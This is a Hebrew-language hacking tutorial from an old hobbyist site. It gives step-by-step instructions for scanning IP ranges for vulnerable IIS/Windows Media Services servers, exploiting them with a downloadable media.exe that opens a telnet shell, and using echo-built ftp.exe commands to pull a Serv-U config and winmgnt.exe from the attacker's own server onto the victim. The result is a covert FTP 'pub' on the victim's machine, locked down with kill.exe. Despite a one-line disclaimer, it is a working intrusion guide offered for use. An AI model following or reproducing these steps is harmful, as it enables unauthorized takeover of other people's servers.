Site hosted by Angelfire.com: Build your free website today!

www.x-mic.net

 

המדריך לפריצת+סריקה iis media

=================

 

 

=====================================================

כל מה שכתוב פה ללמידה בלבד וכול מי שמשתמש בו לפריצה הוא לעשית נזק כלשהו עובר על החוק

=====================================================

 

 

א:מצרכים FTP שתומך בפיקסוס

ב:את התוכנה SERV -U

ג:את האקספלויט של IIS MEDIA

ד:סורק של IIS MEDIA

ה:ואת הקובץ winmgnt

 

הערות

--------------------------------

דבר ראשון אני יוצאה מנקודת הנחה שאתם יודעים להשתמש בתוכנת SERV U

אם אתם לא יודעים תשחקו איתה קצת

זה אנגילת פשוטה להבנה  אז אתם יכולים להסתדר בלי מדריך

ועובדה שאני יסתדרתי בלי מדריך לתוכנה הזאות

והערה אחרונה אם אני אומר פאב אני מתכון FTP (זה לא אותו דבר אבל למען הונחיות שלי בכתיבת המדריך אז זה אותו דבר)

--------------------------------

 

תורידו את התוכנה serv-U מפה:

http://www.serv-u.com/customer/record.asp?prod=su

ותתקינו את התוכנה ותפתחו חשבון ftp בעזרת התוכנה

וחשוב מאוד שהחשבון הזה יתמוך בפייקסוס מפאב לפאב

 

 

ועכשיו כנסו לFTP שפתחתם ותעלו לשמה

את הקבצים הבאים

ServUDaemon.ini

הקובץ שיך לתוכנה serv u והוא יופיע רק אחרי שתפתחו פאב על המחשב שלכם

ואם אתם לא מוצאים אותו תעשו חיפוש לקובץ הזה

 

ואחרי שעלתם את הקובץ ServUDaemon.ini

תעלו את הקובץ winmgnt.exe

הניתן להורדה מהקישור הבא:

http://www.x-mic.net/programs/WINMGNT.rar

 

 

טוב אחרי שפתחתם חשבון ftp ועלתם לשמה את הקבצים  אז צריך לסרוק שרתים פגעים אנחנו נסרוק בעזרת התוכנה scan500

הקישור להורדה נמצא פה:

http://www.x-mic.net/programs/scan500.rar

אחרי שהורדתם אתם צריכים לסרוק טווח של מחשבים (מדריך למצאית טווחים יש בגיליון השני של Iha)

הסריקה פשוטה מאוד תשימו את הקובץ scan1000.exe בכונן c תחת תיקיה scan iis media

אם אין לכם את התיקיה הזאות אז תפתחו אותה

עכשיו כנסו לדוס התחל>הפעלה>cmd

אם יש לכם וינדוס באנגלית אז start>run>cmd

נכנסתם לדוס? יופי עכשיו תכתבו שמה

cd c:\scan iis media

ושמה תכתבו את הפקודה הזאות scan500 -meida ip1 ip2

ip1=הIP שממנו תתחיל הסריקה

ip2=הIP שבאו תעצור הסריקה

שבעצם בIP אתם כותבים את הטווח שמצאתם

עכשיו אם זה גמר לסרוק אז הוא יכתוב לכם משהו כזה

 

----------------------------

Please wait 253 Thread end.....

253 Host search complete. Find 4 hole!

----------------------------

עכשיו הסבר קצר על מה שהוא כותב לכם

אתם רואים שכתוב 253 זה אומר שהוא סרק 253 מחשבים (IP)

איפה שכתוב 4 זה אומר שהוא מצא 4 מחשבים אם החור של הIIS MEDIA

זה אומר שיש לנו ארבע תוצאות שצריך לבדוק אם הם פריצות

אם היה כתוב אפס זה אומר שאין תוצאות טובות

 

אחרי שסרקנו וזה כתב לנו שיש משהו פריץ אז כנסו לתיקיה ששמנו את SCAN500

למי שלא זוכר איפה שמנו אז שמנו את זה  ב c:\scan iis media

ואחרי שנכנסו לתיקיה אז אמור להיות שמה מסמך טקסט שכתוב בו משהו כזה

 

------------------------

213.156.5.155 Windows Media Services Enabled!

213.164.248.117 Windows Media Services Enabled!

213.156.69.121 Windows Media Services Enabled!

------------------------

רק אם מספרים אחרים

כאילו IP אחר

 

עכשיו נעבור לפריצה עצמה

תורידו את האקספלויט של IIS MEDIA מפה:

https://www.angelfire.lycos.com/co4/bd/media.exe

ותשימו אותו בכונן c

 

עכשיו כנסו לדוס

התחל>הפעלה>cmd

start>run<cmd

ותכתבו שממה cd\

 

אחרי זה תכתבו 

את הפקודה הבאה

-------------

media.exe ip 80

-------------

80=הפורט

ip=הIP שיצא בסריקה נגיד אם יצאה לנו בסריקה משהו כזה

213.156.5.155 Windows Media Services Enabled!

אז נכתוב

-------------

media.exe 213.156.5.155

-------------

 

אחרי שכתבתם את הקוד הזה תלחצו על ENTER

אם זה פותח לכם חלון של טלנט (telnet)

אז פרצתם למחשב

אם לא אז תעברו לתוצאה הבאה בסריקה ותעשו את הפועלה הקודמת שעשינו

 

עכשיו אחרי שזה פתח לנו חלון טלנט אנחנו יכולים לעשות מה שאנחנו רוצים במחשב שלו

אבל אנחנו נפתח לו היום ftp על המחשב

 

טוב אז נתחיל זוכרים את הפאב שפתחנו על המחשב של עצמנו? (אני מקווה שכן)

אז עכשיו נשתמש בו

 

אההההה יש לו עוד הערה  אנחנו לא חייבים לפתוח פאב על עצמנו אנחנו יכולים פשוט להשתמש בכול פאב שתומך בפיקסוס

אבל בשביל הנוחות רצוי לפתוח על עצמנו

 

עכשיו תכתבו את הפקודות האלו אחת אחרי השניה בטלנט

-----------------------

echo open ip port >> c

echo user >> c

echo pass >> c

echo mget *.* >> c

echo bye >> c

ftp.exe -i -s:c

-----------------------

ip=הIP של ההפאב שפתחתם על המחשב שלכם

port=הפורט ששמתם לפאב שלכם

user=שם משתמש של הפאב שלכם

pass=הסיסמא ששמתם על הפאב שלכם

 

אני ממליץ לעשות אחרי הפקודות האלו את הפקודה dir ולראות אם באמת הוא העלה את הקבצים

ServUDaemon.ini וwinmgnt.exe

אם הוא לא עלה את הקבצים תעשו את הפקודות למעלה שוב

 

אחרי זה תכתבו את הפקודה

start winmgnt.exe

 

אם עשיתם את הכול נכון ולא היו בעיות אז אתם יכולים להיכנס עכשיו לפאב שעשיתם

 

 

עכשיו אתם שואלים אך אתם עושים הגנה

אז פשוט תורידו את הקובץ kill.exe מפה:

https://www.angelfire.lycos.com/co4/bd/kill.exe

ותעלו אותו לפאב שפרצתם

ואם אתם משתמשים בflashfxp

אז תלחצו ctrl+r

ותכתבו שמה את הקוד הבא:

--------------------

site exec kill.exe

--------------------

 

וזהו יש לכם פאב מוגן

 

אם יש לכם שאלות הצעות וסתם תגובות  נתן לשלוח אותם לemail שלי

bdhack@hotmail.co.il

or

bdhack@walla.co.il

או לכתוב הודעה בפורום

המדריך שיך לאתר www.x-mic.net